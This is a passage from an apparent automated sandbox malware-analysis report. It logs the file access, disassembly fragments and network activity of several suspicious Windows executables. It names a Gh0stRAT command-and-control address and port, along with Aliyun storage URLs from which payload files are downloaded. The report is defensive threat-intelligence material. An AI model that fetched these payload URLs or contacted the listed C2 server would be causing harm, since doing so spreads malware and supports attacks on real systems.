              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_00007FFE1A51A1B8 FindFirstFileExW,4_2_00007FFE1A51A1B8
              Source: C:\Users\user\Documents\BEqRkb.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]4_2_000000014000DFFE
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]4_2_000000014000DDFF
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4x nop then movsxd rbx, qword ptr [r14+10h]4_2_0000000140011270
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]4_2_000000014000DE96
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]4_2_000000014000DEFB
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]4_2_000000014000E178
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]4_2_000000014000DDD9

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.4:50018 -> 47.243.243.58:8917
              Source: Network trafficSuricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.4:50017 -> 47.243.243.58:8917
              Source: Network trafficSuricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.4:50020 -> 47.243.243.58:8917
              Source: Network trafficSuricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.4:50019 -> 47.243.243.58:8917
              Source: Network trafficSuricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.4:50021 -> 47.243.243.58:8917
              Source: global trafficTCP traffic: 192.168.2.4:50017 -> 47.243.243.58:8917
              Source: Joe Sandbox ViewIP Address: 118.178.60.9 118.178.60.9
              Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownTCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: GetDataHost: a8mw1y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: GetDataHost: a8mw1y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: GetDataHost: a8mw1y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: GetDataHost: a8mw1y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: GetDataHost: a8mw1y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: GetDataHost: a8mw1y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: GetDataHost: a8mw1y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /drops.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /f.dat HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /FOM-50.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /FOM-51.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /FOM-52.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /FOM-53.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: a8mw1y.oss-cn-beijing.aliyuncs.com
              Source: global trafficDNS traffic detected: DNS query: 22mm.oss-cn-hangzhou.aliyuncs.com
              Source: global trafficDNS traffic detected: DNS query: qsuula.net
              Source: 2dHqG0.exe, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://%s/%d.dll
              Source: 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://%s/%d.dllC:
              Source: 2dHqG0.exe, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://%s/ip.txt
              Source: 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://%s/ip.txtC:
              Source: 2dHqG0.exe, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://%s/upx.rar
              Source: 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://%s/upx.rarC:
              Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
              Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
              Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
              Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
              Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
              Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0I
              Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0P
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.drString found in binary or memory: http://ocsp.thawte.com0
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com0_
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sw.symcb.com/sw.crl0
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sw.symcd.com0
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sw1.symcb.com/sw.crt0
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: 189atohci.sys.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
              Source: BEqRkb.exe, 00000007.00000003.2985203284.00000000004E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/
              Source: BEqRkb.exe, 00000007.00000003.2985203284.00000000004E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/1-2246122658-3693405117-2476756634-1002
              Source: BEqRkb.exe, 00000007.00000003.2985203284.00000000004E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/1-2246122658-3693405117-2476756634-1002)Z
              Source: BEqRkb.exe, 00000007.00000003.2985203284.00000000004F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg
              Source: BEqRkb.exe, 00000007.00000003.2985203284.00000000004F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgT
              Source: BEqRkb.exe, 00000007.00000003.2985203284.00000000004F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpghttps://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51
              Source: BEqRkb.exe, 00000007.00000003.2985203284.00000000004F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg
              Source: BEqRkb.exe, 00000007.00000003.2985203284.00000000004F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgt
              Source: BEqRkb.exe, 00000007.00000003.2985203284.00000000004F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg
              Source: BEqRkb.exe, 00000007.00000003.2985203284.00000000004F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg
              Source: BEqRkb.exe, 00000007.00000003.2985203284.00000000004E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/Windows
              Source: BEqRkb.exe, 00000007.00000003.2985203284.00000000004E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/X
              Source: BEqRkb.exe, 00000007.00000003.2985203284.00000000004F8000.00000004.00000020.00020000.00000000.sdmp, BEqRkb.exe, 00000007.00000003.2985203284.00000000004E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg
              Source: BEqRkb.exe, 00000007.00000003.2985203284.00000000004E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg6
              Source: BEqRkb.exe, 00000007.00000003.2985203284.00000000004F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpgming
              Source: BEqRkb.exe, 00000007.00000003.2985203284.00000000004F8000.00000004.00000020.00020000.00000000.sdmp, BEqRkb.exe, 00000007.00000003.2985203284.00000000004E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/f.dat
              Source: BEqRkb.exe, 00000007.00000003.2985203284.00000000004E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/ngzhou.aliyuncs.com/17-2476756634-1002v
              Source: BEqRkb.exe, 00000007.00000003.2985203284.00000000004E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/ngzhou.aliyuncs.com/Windows
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2105362669.000000000051E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/a.gif
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2125185506.000000000051E000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2105362669.000000000051E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/a.gif#
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2125185506.000000000051E000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2105362669.000000000051E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/a.gif3
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2105362669.000000000051E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/a.gifS
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2105362669.000000000051E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/a.gifT
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163616364.000000000051E000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125185506.000000000051E000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2105362669.000000000051E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/a.gifhttps://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifhttp
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163616364.000000000051E000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125185506.000000000051E000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2105362669.000000000051E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gif
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2125185506.000000000051E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifIS
